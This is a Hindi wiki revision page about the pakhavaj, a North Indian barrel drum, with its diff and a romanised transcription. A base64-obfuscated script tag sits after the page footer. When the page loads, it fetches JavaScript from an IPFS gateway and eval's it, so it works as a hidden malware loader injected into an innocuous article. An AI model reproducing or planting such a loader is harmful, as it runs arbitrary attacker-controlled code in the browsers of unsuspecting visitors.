Difference between revisions of "पखावज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} thumb|पखावज '''पखावज''' [[उत्तर भार...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Pakawaj.jpg|thumb|पखावज]]
 
[[चित्र:Pakawaj.jpg|thumb|पखावज]]
 
'''पखावज''' [[उत्तर भारत|उत्तरी भारत]] का एक थाप यंत्र है। [[मृदंग]], पखावज और खोल लगभग समान संरचना वाले वाद्य-यंत्र है।  
 
'''पखावज''' [[उत्तर भारत|उत्तरी भारत]] का एक थाप यंत्र है। [[मृदंग]], पखावज और खोल लगभग समान संरचना वाले वाद्य-यंत्र है।  
 
*पखावज एक [[वाद्य यंत्र]] है जो चमड़े से मढ़ा हुआ होता है और ऐसे वाद्यों को अवनद्ध कहा जाता है।
 
*पखावज एक [[वाद्य यंत्र]] है जो चमड़े से मढ़ा हुआ होता है और ऐसे वाद्यों को अवनद्ध कहा जाता है।
*वर्तमान में भी [[भारत]] के लोकसंगीत में [[ढोल]], [[मृदंग]], [[झांझ]], [[मंजीरा]], ढप, [[नगाड़ा]], पखावज, एकतारा आदि वाद्य यंत्रों का प्रचलन है।  
+
*वर्तमान में भी [[भारत]] के लोकसंगीत में [[ढोल]], [[मृदंग]], [[झांझ]], [[मंजीरा]], ढप, [[नगाड़ा]], पखावज, [[एकतारा]] आदि वाद्य यंत्रों का प्रचलन है।  
 
*पखावज मृदंग की तुलना में कुछ अधिक लम्बा होता है तथा इसमें डोरियों को कसने हेतु लकड़ी के कुछ गुटके लगे होते है।
 
*पखावज मृदंग की तुलना में कुछ अधिक लम्बा होता है तथा इसमें डोरियों को कसने हेतु लकड़ी के कुछ गुटके लगे होते है।
  

Latest revision as of 13:34, 26 January 2012

thumb|pakhavaj pakhavaj uttari bharat ka ek thap yantr hai. mridang, pakhavaj aur khol lagabhag saman sanrachana vale vady-yantr hai.

  • pakhavaj ek vady yantr hai jo cham de se madha hua hota hai aur aise vadyoan ko avanaddh kaha jata hai.
  • vartaman mean bhi bharat ke lokasangit mean dhol, mridang, jhaanjh, manjira, dhap, naga da, pakhavaj, ekatara adi vady yantroan ka prachalan hai.
  • pakhavaj mridang ki tulana mean kuchh adhik lamba hota hai tatha isamean doriyoan ko kasane hetu lak di ke kuchh gutake lage hote hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>